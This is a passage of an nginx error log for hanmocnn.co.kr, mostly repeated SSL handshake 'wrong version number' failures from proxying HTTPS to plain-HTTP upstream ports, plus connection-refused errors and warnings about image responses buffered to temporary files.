381#381: *368 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:09:54 [error] 383#383: *377 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:09:54 [warn] 383#383: *377 upstream server temporarily disabled while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:09:54 [error] 383#383: *377 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:09:54 [warn] 383#383: *377 upstream server temporarily disabled while SSL handshaking to upstream, client: 35.204.135.22, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:45:26 [error] 506#506: *1033 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:45:26 [warn] 506#506: *1033 upstream server temporarily disabled while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:45:26 [error] 506#506: *1033 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:45:26 [warn] 506#506: *1033 upstream server temporarily disabled while SSL handshaking to upstream, client: 94.247.172.129, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:03 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:03 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:03 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:03 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:15 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:15 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:15 [error] 509#509: *1193 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:15 [warn] 509#509: *1193 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:31 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:31 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:31 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:31 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:33 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:33 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:33 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:33 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:38 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:38 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:38 [error] 530#530: *1208 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:51:38 [warn] 530#530: *1208 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:52:14 [error] 543#543: *1232 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:52:14 [warn] 543#543: *1232 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:52:14 [error] 543#543: *1232 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:52:14 [warn] 543#543: *1232 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:38 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:38 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:38 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:38 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:43 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:43 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:43 [error] 605#605: *1291 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:43 [warn] 605#605: *1291 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:51 [error] 606#606: *1299 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:51 [warn] 606#606: *1299 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:51 [error] 606#606: *1299 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:56:51 [warn] 606#606: *1299 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:57:26 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:57:26 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:57:26 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:57:26 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:57:49 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:57:49 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:57:49 [error] 194#194: *1 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:57:49 [warn] 194#194: *1 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:59:06 [error] 214#214: *21 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:59:08 [error] 214#214: *21 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:59:12 [error] 214#214: *21 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:59:42 [error] 227#227: *37 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 23:59:46 [error] 227#227: *37 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr" -2026/02/15 00:02:19 [error] 241#241: *64 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/15 00:02:19 [warn] 241#241: *64 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/15 00:02:19 [error] 241#241: *64 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/15 00:02:19 [warn] 241#241: *64 upstream server temporarily disabled while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/15 00:02:52 [error] 253#253: *76 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/15 00:02:52 [warn] 253#253: *76 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/15 00:02:52 [error] 253#253: *76 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/15 00:02:52 [warn] 253#253: *76 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/15 00:03:33 [error] 282#282: *107 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr" -2026/02/15 00:03:40 [error] 282#282: *107 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr" -2026/02/15 00:04:37 [error] 292#292: *126 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8081/", host: "www.hanmocnn.co.kr" -2026/02/15 00:04:49 [error] 305#305: *138 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:80/", host: "www.hanmocnn.co.kr" -2026/02/15 00:05:16 [error] 319#319: *150 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8081/", host: "www.hanmocnn.co.kr" -2026/02/15 00:10:21 [error] 363#363: *212 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://192.168.0.250:8081/", host: "www.hanmocnn.co.kr" -2026/02/15 00:53:59 [warn] 378#378: *575 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000000001 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 01:03:57 [warn] 378#378: *585 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000000002 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 01:10:26 [warn] 378#378: *603 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000000003 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 01:11:14 [warn] 378#378: *603 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000000004 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 01:14:43 [warn] 378#378: *630 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000000005 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 01:17:46 [warn] 378#378: *641 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000000006 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 01:18:21 [warn] 378#378: *641 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/00/0000000007 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 01:18:51 [warn] 378#378: *641 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/00/0000000008 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 02:06:56 [warn] 521#521: *4047 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/49/0000001495 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 05:11:46 [warn] 519#519: *7561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/98/0000002989 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 05:22:47 [warn] 519#519: *7591 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/99/0000002992 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 05:27:40 [warn] 519#519: *7607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/99/0000002993 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 05:27:40 [warn] 519#519: *7607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/99/0000002994 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 05:37:46 [warn] 519#519: *7631 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/99/0000002995 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 05:46:06 [warn] 520#520: *7667 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/99/0000002996 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 05:46:06 [warn] 520#520: *7667 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/99/0000002997 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 05:46:06 [warn] 520#520: *7667 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/99/0000002998 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 06:01:10 [warn] 531#531: *7684 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/00/0000003000 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 06:05:20 [warn] 530#530: *7693 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000003001 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 06:05:20 [warn] 530#530: *7693 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000003002 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 06:05:20 [warn] 530#530: *7693 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000003003 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/15 06:08:49 [warn] 531#531: *7709 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000003004 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: 